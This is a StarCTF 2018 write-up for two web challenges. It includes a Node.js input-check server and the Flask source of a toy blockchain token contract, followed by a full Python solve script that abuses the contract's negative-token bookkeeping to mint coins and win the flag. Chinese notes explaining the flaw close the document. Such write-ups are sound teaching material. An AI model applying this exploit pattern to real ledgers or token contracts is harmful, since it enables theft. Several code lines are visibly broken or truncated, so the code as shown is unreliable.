StarCTF 2018 Writeup

  1. Web 1: simpleweb
  2. Web 2: Smart? Contract
    1. 分析流程
    2. 分析代码

Web 1: simpleweb

var net = require('net');


var server = net.createServer(function(socket) {
    socket.on('data', (data) => { 
        //m = data.toString().replace(/[\n\r]*$/, '');
        ok = true;
        arr = data.toString().split(' ');
        arr =;
        if (arr.length != 5) 
            ok = false;
        arr1 = arr.slice(0);
        for (var i=0; i<4; i++)
            if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127)
                ok = false;
        arr2 = []
        for (var i=0; i<4; i++)
            arr2.push(arr1[i] + arr1[i+1]);
        val = 0;
        for (var i=0; i<4; i++)
            val = val * 0x100 + arr2[i];
        if (val != 0x23332333)
            ok = false;
        if (ok)
    //socket.write('Echo server\r\n');

HOST = ''
PORT = 23333

server.listen(PORT, HOST);


(((a * 256 + b ) * 256 + c) *256 + d) = 0x23332333




>> [8,12,90].sort()

Web 2: Smart? Contract

Yet another blockchain challenge with tokens in the smart contract. Be careful that the blockchain is stored in the cookie and a browser might ignore set-cookie header if it is too long, which prevents the blockchain being updated. So send the requests using scripts.

# -*- encoding: utf-8 -*-
# written in python 2.7
__author__ = 'garzon'

import pickle
import hashlib, json, rsa, uuid, os
from flask import Flask, session, redirect, url_for, escape, request

app = Flask(__name__)
app.secret_key = '*********************'
url_prefix = '/6af948d659f0b7c5d3950a'

def FLAG():
    return 'Here is your flag: *ctf{******************}'

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def has_attrs(d, attrs):
    if type(d) != type({}): raise Exception("Input should be a dict/JSON")
    for attr in attrs:
        if attr not in d:
            raise Exception("{} should be presented in the input".format(attr))

EMPTY_HASH = '0'*64

def addr_to_pubkey(address):
    return rsa.PublicKey(int(address, 16), 65537)

def pubkey_to_address(pubkey):
    assert pubkey.e == 65537
    hexed = hex(pubkey.n)
    if hexed.endswith('L'): hexed = hexed[:-1]
    if hexed.startswith('0x'): hexed = hexed[2:]
    return hexed

def gen_addr_key_pair():
    pubkey, privkey = rsa.newkeys(384)
    return pubkey_to_address(pubkey), privkey

bank_address, bank_privkey = gen_addr_key_pair()
hacker_address, hacker_privkey = gen_addr_key_pair()

def sign_input_utxo(input_utxo_id, privkey):
    return rsa.sign(input_utxo_id, privkey, 'SHA-1').encode('hex')

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature': [sign_input_utxo(id, privkey_from) for id in input_utxo_ids], 'output': output_utxo}
    tx['hash'] = hash_tx(tx)
    return tx

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) == type(u''): prev_block_hash = str(prev_block_hash)
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block

def find_blockchain_tail(blocks=None):
    if blocks is None: blocks = session['blocks']
    return max(blocks.values(), key=lambda block: block['height'])

class SRC20SmartContract:
    def __init__(self, addr, privkey):
        self.starTokenNum = 0
        self.balanceOfAddr = {addr: 999999999}
        self.addr = addr
        self.privkey = privkey
        self.owned_token_utxos = {}

    def onCall_withdraw(self, tx):
        # by calling this you can convert your StarTokens into StarCoins!
        if len(tx['input']) == 1 and len(tx['output']) == 1 and len(tx['signature']) == 0 and tx['input'][0] in self.owned_token_utxos:
            # which means that you would like to redeem StarCoins in the input utxo using your StarTokens
            recv_addr = tx['output'][0]['addr']
            amount_to_redeem = self.owned_token_utxos[tx['input'][0]]['amount']
            self.sendTokenAtTx(tx, recv_addr, self.addr, amount_to_redeem)
            tx['signature'].append(sign_input_utxo(tx['input'][0], self.privkey))

    def onCall_buyTokens(self, utxos, tx):
        # by calling this you can buy some StarTokens using StarCoins!
        if len(tx['input']) == 1 and len(tx['output']) == 1 and tx['output'][0]['addr'] == self.addr:
            self.sendTokenAtTx(tx, self.addr, utxos[tx['input'][0]]['addr'], tx['output'][0]['amount'])

    def getTokenBalance(self, addr):
        if addr not in self.balanceOfAddr: return 0
        return self.balanceOfAddr[addr]

    def sendTokenAtTx(self, tx, from_addr, to_addr, amount):
        if self.getTokenBalance(from_addr) < amount: raise Exception("no enough StarToken at " + from_addr)
        if to_addr == self.addr:
            from_addr, to_addr = to_addr, from_addr
            amount = -amount
        utxo_used_to_record_SRCToken = create_output_utxo(to_addr, 0)
        obj = {'utxo_id': utxo_used_to_record_SRCToken['id'], 'tokenNum': amount}
        payload = json.dumps(obj)
        signature = self.signSRCTokenUtxoPayload(payload)
        info = signature + '$$$' + payload
        utxo_used_to_record_SRCToken['extra'] = info

    def signSRCTokenUtxoPayload(self, payload):
        return rsa.sign(payload, self.privkey, 'SHA-1').encode('hex')

    def verifySRCTokenUtxoPayload(self, payload, signature):
            return rsa.verify(payload, signature.decode('hex'), addr_to_pubkey(self.addr))
            return False

    def extractInfoFromUtxos(self, utxos):
        for utxo_id, utxo in utxos.items():
            if 'extra' in utxo:
                info = utxo['extra']
                if type(info) == type(u''): info = str(info)
                if type(info) != type(''): raise Exception("unknown type of 'extra' in utxo")
                if '$$$' not in info: raise Exception("signature of SRC20 token is not found")
                signature = info[:info.index('$$$')]
                payload = info[info.index('$$$')+3:]
                if not self.verifySRCTokenUtxoPayload(payload, signature): raise Exception("this SRC20 token is fake")
                obj = json.loads(payload)
                if obj['utxo_id'] != utxo['id']: raise Exception("the id of utxo does not match the one on the token")
                if utxo['addr'] not in self.balanceOfAddr: self.balanceOfAddr[utxo['addr']] = 0
                self.balanceOfAddr[utxo['addr']] += obj['tokenNum']
            if utxo['addr'] == self.addr: self.owned_token_utxos[utxo['id']] = utxo

def calculate_utxo(blockchain_tail):
    starToken_contract = SRC20SmartContract(bank_address, bank_privkey)
    curr_block = blockchain_tail
    blockchain = [curr_block]
    while curr_block['hash'] != session['genesis_block_hash']:
        curr_block = session['blocks'][curr_block['prev']]
    blockchain = blockchain[::-1]
    utxos = {}
    for block in blockchain:
        for tx in block['transactions']:
            for input_utxo_id in tx['input']:
                del utxos[input_utxo_id]
            for utxo in tx['output']:
                utxos[utxo['id']] = utxo
    return utxos, starToken_contract

def calculate_balance(utxos):
    balance = {bank_address: 0, hacker_address: 0}
    for utxo in utxos.values():
        if utxo['addr'] not in balance:
            balance[utxo['addr']] = 0
        balance[utxo['addr']] += utxo['amount']
    return balance

def verify_utxo_signature(address, utxo_id, signature):
        return rsa.verify(utxo_id, signature.decode('hex'), addr_to_pubkey(address))
        return False

def append_block(block, difficulty=int('f'*64, 16)):
    has_attrs(block, ['prev', 'nonce', 'transactions'])

    if type(block['prev']) == type(u''): block['prev'] = str(block['prev'])
    if type(block['nonce']) == type(u''): block['nonce'] = str(block['nonce'])
    if block['prev'] != find_blockchain_tail()['hash']: raise Exception("You do not have the dominant mining power so you can only submit tx to the last block.")
    tail = session['blocks'][block['prev']]
    utxos, contract = calculate_utxo(tail)

    if type(block['transactions']) != type([]): raise Exception('Please put a transaction array in the block')
    new_utxo_ids = set()
    for tx in block['transactions']:
        has_attrs(tx, ['input', 'output', 'signature'])

        for utxo in tx['output']:
            has_attrs(utxo, ['amount', 'addr', 'id'])
            if type(utxo['id']) == type(u''): utxo['id'] = str(utxo['id'])
            if type(utxo['addr']) == type(u''): utxo['addr'] = str(utxo['addr'])
            if type(utxo['id']) != type(''): raise Exception("unknown type of id of output utxo")
            if utxo['id'] in new_utxo_ids: raise Exception("output utxo of same id({}) already exists.".format(utxo['id']))
            if type(utxo['amount']) != type(1): raise Exception("unknown type of amount of output utxo")
            if utxo['amount'] < 0: raise Exception("invalid amount of output utxo")
            if type(utxo['addr']) != type(''): raise Exception("unknown type of address of output utxo")
                raise Exception("invalid type of address({})".format(utxo['addr']))
            utxo['hash'] = hash_utxo(utxo)

        for new_id in new_utxo_ids:
            if new_id in utxos:
                raise Exception("invalid id of output utxo. utxo id({}) exists".format(utxo_id))

        if type(tx['input']) != type([]): raise Exception("type of input utxo ids in tx should be array")
        if type(tx['signature']) != type([]): raise Exception("type of input utxo signatures in tx should be array")

        tx['input'] = [str(i) if type(i) == type(u'') else i for i in tx['input']]
        for utxo_id in tx['input']:
            if type(utxo_id) != type(''): raise Exception("unknown type of id of input utxo")
            if utxo_id not in utxos: raise Exception("invalid id of input utxo. Input utxo({}) does not exist or it has been consumed.".format(utxo_id))

        if contract is not None:
            if 'call_smart_contract' in tx:
                if tx['call_smart_contract'] == 'buyTokens': contract.onCall_buyTokens(utxos, tx)
                if tx['call_smart_contract'] == 'withdraw': contract.onCall_withdraw(tx)

        tot_input = 0
        if len(tx['input']) != len(tx['signature']): raise Exception("lengths of arrays of ids and signatures of input utxos should be the same")
        tx['signature'] = [str(i) if type(i) == type(u'') else i for i in tx['signature']]
        for utxo_id, signature in zip(tx['input'], tx['signature']):
            utxo = utxos[utxo_id]
            if type(signature) != type(''): raise Exception("unknown type of signature of input utxo")
            if not verify_utxo_signature(utxo['addr'], utxo_id, signature):
                raise Exception("Signature of input utxo is not valid. You are not the owner of this input utxo({})!".format(utxo_id))
            tot_input += utxo['amount']
            del utxos[utxo_id]

        tot_output = sum([utxo['amount'] for utxo in tx['output']])
        if tot_output > tot_input:
            raise Exception("You don't have enough amount of StarCoins in the input utxo! {}/{}".format(tot_input, tot_output))
        tx['hash'] = hash_tx(tx)

    block = create_block(block['prev'], block['nonce'], block['transactions'])
    block_hash = int(block['hash'], 16)
    #We are users in this challenge, so leave the Proof-of-Work thing to the non-existent miners
    #if block_hash > difficulty: raise Exception('Please provide a valid Proof-of-Work')
    block['height'] = tail['height']+1
    if len(session['blocks']) > 10: raise Exception('The blockchain is too long. Use ./reset to reset the blockchain')
    if block['hash'] in session['blocks']: raise Exception('A same block is already in the blockchain')
    session['blocks'][block['hash']] = block
    session.modified = True

def init():
    if 'blocks' not in session:
        session['blocks'] = {}

        # At first, the bank issued some StarCoins, and give you 100
        currency_issued = create_output_utxo(bank_address, 200)
        airdrop = create_output_utxo(hacker_address, 100)
        genesis_transaction = create_tx([], [currency_issued, airdrop]) # create StarCoins from nothing
        genesis_block = create_block(EMPTY_HASH, 'The Times 03/Jan/2009 Chancellor on brink of second bailout for bank', [genesis_transaction])

        session['genesis_block_hash'] = genesis_block['hash']
        genesis_block['height'] = 0
        session['blocks'][genesis_block['hash']] = genesis_block

def get_balance_of_all():
    tail = find_blockchain_tail()
    utxos, contract = calculate_utxo(tail)
    return calculate_balance(utxos), utxos, tail, contract

def homepage():
    announcement = ''
    balance, utxos, _, contract = get_balance_of_all()
    genesis_block_info = 'hash of genesis block: ' + session['genesis_block_hash']
    addr_info = 'the bank\'s addr: ' + bank_address + ', your addr: ' + hacker_address + ', your privkey: ' + pickle.dumps(hacker_privkey).encode('hex')
    balance_info = 'StarCoins balance of all addresses: ' + json.dumps(balance)
    starcoins_utxo_info = 'All utxos: ' + json.dumps(utxos)
    startokens_info = 'StarTokens balance of all addresses: ' + json.dumps(contract.balanceOfAddr)
    blockchain_info = 'Blockchain Explorer: ' + json.dumps(session['blocks'])
    view_source_code_link = "<a href='source_code'>View source code</a>"
    return announcement+('.<br /><br />\r\n\r\n'.join([view_source_code_link, genesis_block_info, addr_info, balance_info, starcoins_utxo_info, startokens_info, blockchain_info]))

DIFFICULTY = int('00000' + 'f' * 59, 16)
@app.route(url_prefix+'/create_block', methods=['POST'])
def create_block_api():
        block = json.loads(
        append_block(block, DIFFICULTY)
        msg = 'transaction finished.'
    except Exception, e:
        return str(e)

    balance, utxos, tail, contract = get_balance_of_all()

    if balance[hacker_address] == 200:
        msg += ' Congratulations~ ' + FLAG()
    return msg

# if you mess up the blockchain, use this to reset the blockchain.
def reset_blockchain():
    if 'blocks' in session: del session['blocks']
    if 'genesis_block_hash' in session: del session['genesis_block_hash']
    return 'reset.'

def show_source_code():
    source = open('', 'r')
    html = ''
    for line in source:
        line = line.decode('utf8', 'ignore')
        html += line.replace('&','&amp;').replace('\t', '&nbsp;'*4).replace(' ','&nbsp;').replace('<', '&lt;').replace('>','&gt;').replace('\n', '<br />')
    return html

if __name__ == '__main__':, host='', port=10012)



# -*- encoding: utf-8 -*-
# written in python 2.7
__author__ = 'garzon'

import requests, json, hashlib, rsa, pickle, uuid

from server import *

# do some modifications to the original one to remove 'session' variable and privkey
def calculate_utxo(blocks, bankAddr, blockchain_tail):
    starToken_contract = SRC20SmartContract(bankAddr, 0)
    curr_block = blockchain_tail
    blockchain = [curr_block]
    while curr_block['height'] != 0:
        curr_block = blocks[curr_block['prev']]
    blockchain = blockchain[::-1]
    utxos = {}
    for block in blockchain:
        for tx in block['transactions']:
            for input_utxo_id in tx['input']:
                del utxos[input_utxo_id]
            for utxo in tx['output']:
                utxos[utxo['id']] = utxo
    print 'utxos = {'
    for utxo in utxos:
        print  json.dumps(utxo) + ' : \n\t' + json.dumps(utxos[utxo])
    print '}'
    return utxos, starToken_contract

# ==============

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def find_inner_str(haystack, st, ed=None):
    haystack = haystack[haystack.index(st)+len(st):]
    if ed is None: return haystack
    return haystack[:haystack.index(ed)]

def append_block(block):
    print "block = \n\t" + json.dumps(block)
    print '[APPEND]','/create_block', data=json.dumps(block),proxies=proxies).text
    print "\n\n"

is_first_time = True
def show_blockchain():
    global is_first_time
    ret = s.get(url_prefix+'/',proxies=proxies).text
    #print ret.replace('<br />','')
    tokens = json.loads(find_inner_str(ret, 'StarTokens balance of all addresses: ', '.'))
    balance = json.loads(find_inner_str(ret, 'StarCoins balance of all addresses: ', '.'))
    print 'tokens = ' + json.dumps(tokens)
    print 'balance = ' + json.dumps(balance)
    if not is_first_time:
        print '[tokens = {}, balance = {}]'.format(tokens.get(my_address, 0), balance[my_address])
    is_first_time = False
    print 'block trains = \n\t' + find_inner_str(ret, 'Blockchain Explorer: ')
    return ret, json.loads(find_inner_str(ret, 'Blockchain Explorer: '))

def redeem(bank_owned_utxo_id, tail, amount, nonce):
    output_to_get_starcoins = create_output_utxo(my_address, amount)
    tx = create_tx([bank_owned_utxo_id], [output_to_get_starcoins], my_privkey) # my_privkey is dummy, the signature will be overwritten
    tx['signature'] = [] # remains the field to be filled by smart contract
    tx['call_smart_contract'] = 'withdraw'
    block = create_block(tail['hash'], nonce, [tx])
    return output_to_get_starcoins

def buyTokens(utxoIdPaid, tail, amount, contractAddr, nonce):
    output_to_get_tokens = create_output_utxo(contractAddr, amount)
    tx = create_tx([utxoIdPaid], [output_to_get_tokens], my_privkey)
    tx['call_smart_contract'] = 'buyTokens'
    block = create_block(tail['hash'], nonce, [tx])
    return output_to_get_tokens

url_prefix = ''
proxies = {"http":""}
s = requests.session()

# 100 starcoins
resp, blocks = show_blockchain()
my_address, my_privkey = find_inner_str(resp, 'your addr: ', ','), pickle.loads(find_inner_str(resp, 'your privkey: ', '.').decode('hex'))
bankAddr = find_inner_str(resp, 'the bank\'s addr: ', ',')

tail = find_blockchain_tail(blocks)
utxos, contract = calculate_utxo(blocks, bankAddr, tail)
for utxo in utxos.values():
    if utxo['addr'] == my_address: my_utxo = utxo # find the utxo of 100 starcoins 
    if utxo['addr'] == bankAddr: coinsIssued = utxo
first100TokenBankOwned = buyTokens(my_utxo['id'], tail, 100, contract.addr, 'step1')

# 100 tokens
resp, blocks = show_blockchain()
tail = find_blockchain_tail(blocks)
utxos, contract = calculate_utxo(blocks, bankAddr, tail)
for utxo in utxos.values():
    if utxo['addr'] == my_address:
my_first_100_tokens_utxo_id = utxo['id']
my_100_starcoins = redeem(first100TokenBankOwned['id'], tail, 100, 'step2')

# 100 starcoins, 100 - 100 tokens
resp, blocks = show_blockchain()
tail = find_blockchain_tail(blocks)
utxos, contract = calculate_utxo(blocks, bankAddr, tail)
for utxo in utxos.values():
    if utxo['addr'] == my_address and utxo['id'] != my_first_100_tokens_utxo_id and utxo['amount'] == 0:
        break # find the utxo of -100 tokens
output_to_send_minus_100_token = create_output_utxo(bankAddr, 0)
tx = create_tx([utxo['id']], [output_to_send_minus_100_token], my_privkey)
block = create_block(tail['hash'], 'step3', [tx])

# 100 starcoins, 100 tokens, but the bank now just own a utxo of 200 starcoins, we need 200 tokens to redeem that utxo
resp, blocks = show_blockchain()
tail = find_blockchain_tail(blocks)
buyTokens(my_100_starcoins['id'], tail, 100, contract.addr, 'step4')

# 200 tokens to exchange the utxo of 200 starcoins owned by the bank initially
resp, blocks = show_blockchain()
tail = find_blockchain_tail(blocks)
redeem(coinsIssued['id'], tail, 200, 'step5')







注意到回到了tokens为0(100 + -100 = 0),balance为100的局面,仿佛一切回到了原点,


这是我们的地址,从这里转0个币(amount = 0)到银行,


即,原来的utxos中包括了两个存有extra数据的utxo,分别记录了tokenNum=100tokenNum=-100,计算你的tokens值时,会将他们求总和,即100 + -100 = 0

后面,我们通过转账0个币给银行,导致存储着tokenNum = -100utxo被使用了,其中存储的tokenNum = -100也就不会再参与计算你的tokens值,那么,计算你的tokens时,求总和,即100 = 100,此时,你的tokens为100。





在withdraw时,这里amount = -amount ,这是什么操作?意义是?当时看到这里我就一直在迷。

再来看,当tokenNum为-100时,转账amount = 0时,导致我们tokens增加100。

